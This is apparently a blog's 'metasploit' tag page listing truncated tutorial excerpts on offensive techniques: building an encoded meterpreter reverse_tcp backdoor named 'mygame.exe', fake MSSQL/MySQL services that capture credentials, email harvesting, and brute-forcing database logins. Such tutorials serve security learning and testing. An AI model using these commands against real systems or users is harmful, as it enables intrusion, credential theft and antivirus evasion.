Tag: metasploit


Setup Metasploit Database

Try reconfiguring Metasploit: dpkg-reconfigure metasploit-framework
Start postgresql: systemctl start postgresql.service
Initialize the database: msfdb init
Run Metasploit: msfconsole
Connect to the database: db_connect -y /usr/share/metasploit-framework/config/database.yml
Rebuild the cache: db_rebuild_cache
Run postgresql at startup: systemctl enable postgresql.service


How to generate shellcode from custom exe in metasploit

To use a custom exe as a payload, or to use your custom exe in a document or Excel file, you have to “convert” your exe to shellcode. To accomplish this: 1> Run Kali Linux 2> Open a terminal window 3> Type msfconsole and hit enter 4> Type use payload/generic/custom and hit enter 5> …

Information Gathering, Metasploit, Reconnaissance

Email harvesting with Metasploit

Email harvesting is the process of obtaining lists of email addresses using various methods. You can check for yourself which email addresses attackers are going to find for your domain using Metasploit’s module, Search Engine Domain Email Address Collector. This module uses Google, Bing and Yahoo to create a list of valid email addresses for …

Backdoors, Metasploit

Create crypted Backdoor with Metasploit and Backtrack

We will use the windows/meterpreter/reverse_tcp payload. We will encode the payload 10 times with shikata_ga_nai and 10 times with call4_dword_xor.   1. Open a console window   2. Type: msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t exe -c 10 -o mygame.exe …

Metasploit, Phishing

MSSQL Phishing with metasploit

Metasploit has an MSSQL capture module, called mssql. This module provides a fake MSSQL service designed to capture MSSQL server authentication credentials. The module supports both the weakly encoded database logins and Windows logins (NTLM).   To select the capture module type: use auxiliary/server/capture/mssql
Options
You can set CAINPWFILE …

Metasploit, MSSQL

Brute forcing Microsoft SQL Server

Metasploit offers the auxiliary module mssql_login. This module will query the MSSQL instance for a specific username and password pair.   The default administrator username for SQL Server is sa. In the options of this module, you can specify a specific password, a password list, a username list, or a username-password list where usernames and …

Metasploit, MSSQL

Detecting a Microsoft SQL Server

Microsoft SQL Server (MSSQL) is a relational database management system (RDBMS) used to store, retrieve and manage information. As with many Microsoft products, SQL Server has many security weaknesses. Let’s start by identifying running SQL servers on the network.
Discover open MSSQL ports
MSSQL runs by default on port 1433. To discover SQL …

Metasploit, Phishing

Let’s go Phishing

Phishing is an attempt to steal sensitive information by impersonating a well-known organization or website. In the same manner you can trick a user and steal her MySQL credentials. One of Metasploit’s abilities is exactly this: mimicking known services and capturing user credentials. Among the various capture modules there is a module called …

Brute-force, Databases, Metasploit, MySQL

Brute forcing MySQL

There is an auxiliary module in Metasploit called mysql_login which will happily query a MySQL server for specific usernames and passwords.   To start your attack you have to set the RHOSTS option and choose a username and a password if you would like a single login query:
set RHOSTS
Let’s try …

Metasploit, NMAP, Port Scanning

Discover open mysql ports

MySQL runs by default on port 3306. You can discover it either with nmap or with Metasploit’s auxiliary modules.
The NMAP way
Nmap is a free and open source network discovery and security auditing utility. It can discover open ports, running services, the operating system version and much more. To discover …